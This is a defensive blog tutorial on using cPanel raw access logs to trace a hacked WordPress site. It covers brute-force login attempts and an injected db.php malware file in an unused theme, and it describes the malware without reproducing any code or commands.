How to Fix Hacked Site: Checking raw access logs

How to Fix Hacked Site: Checking raw access logs

Most web hosting environment will provide us a feature to check the website activities in the background in raw log format. From here we can see who’s connecting to the site at certain time stamp, their ip address, what files or urls being accessed, etc etc.

Today we will show you how to use this raw access logs to identify unusual activity on your site. If your website had been hacked or showing unusual activity, this can help you to track down bad ips, malwares which has been buried into the files, anonymous running scripts, trojan horses, etc. This tips will be mostly based on CPanel hosting environment, but other hosting platform will also their similar method to log the website events.

In CPanel Hosting, the raw access logs can be downloaded by going to the “Raw Access” menu under Metrics section. Once downloaded, extract the gzip file and give it a .txt extension so that it can be easily view in any text editor application. We’re using Notepad++ for this troubleshooting purpose. And we’re using the case study from one of our external client that having their WordPress site hacked for months.

Some of the information that we can get from the log data:

Marker A – Brute force bot attack from single foreign IP address accessing the /wp-login.php at least 4-5 times per second. This is one of the IP address need to be blacklisted.
Marker B – Search engine crawling routine by Russia No. 1 Search provider, Yandex. This does not really harm the site but if you don’t need it, there are many ways to block certain search bot from accessing your page.

Further down, we have found something interesting other than the Bad Brutforce Bot keep on trying to find the correct password.

Marker C – Bad Brutforce login bot still trying…

Marker D – Unusual and lots of calls to db.php file which resides in one of the themes folder. From the information we have from the cpanel file manager, this themes is one of the dozens which not being used. And also the selection of filename is very far from any filename used in most WordPress themes and it should not being accessed in such a way.

We go back into the CPanel File manager to inspect this suspicious file.

There’re bunch of unused WordPress themes and from the log, we found that one of them is vulnerable and has been injected with malware file. *Please keep your theme up to date and delete any unused themes/plugins from your site.

Using the CPanel Filemanager, we inspect the db.php file and it contains codes that belong to a Joomla installation. Also within the codes, there is some sort of encoded lines that we have to decode to know the purpose.

Marker E – This file does not have anything to do with WordPress. Bad file.

Marker F – Encoded command/url. Whitehat programmer or developer do not encode their scripts and code. Bad intention detected.

We copy the encoded string and decoded it online using Online URL Decoder Encoder tool and the result shows that this is where thing goes wrong. This malware file will redirect anyone to accessing the site to another url and at the same it is also being called externally from various IP address to execute other unknown commands.

Summary:

  • This is one of the hijacking method found on this particular project. There few more infections has been detected within the same website which has different purposes and origin.
  • Always keep your theme file up to date and delete unused themes & plugins.
  • Apply security precaution or plugins to your WordPress site. IP blocking is important to block daily bot attack.
  • Monitor site activity and do frequent backup. Less damage if detection is made earlier.

Website Security Services & Troubleshoot hacked website services : Please contact eWallz OPS.

Share this post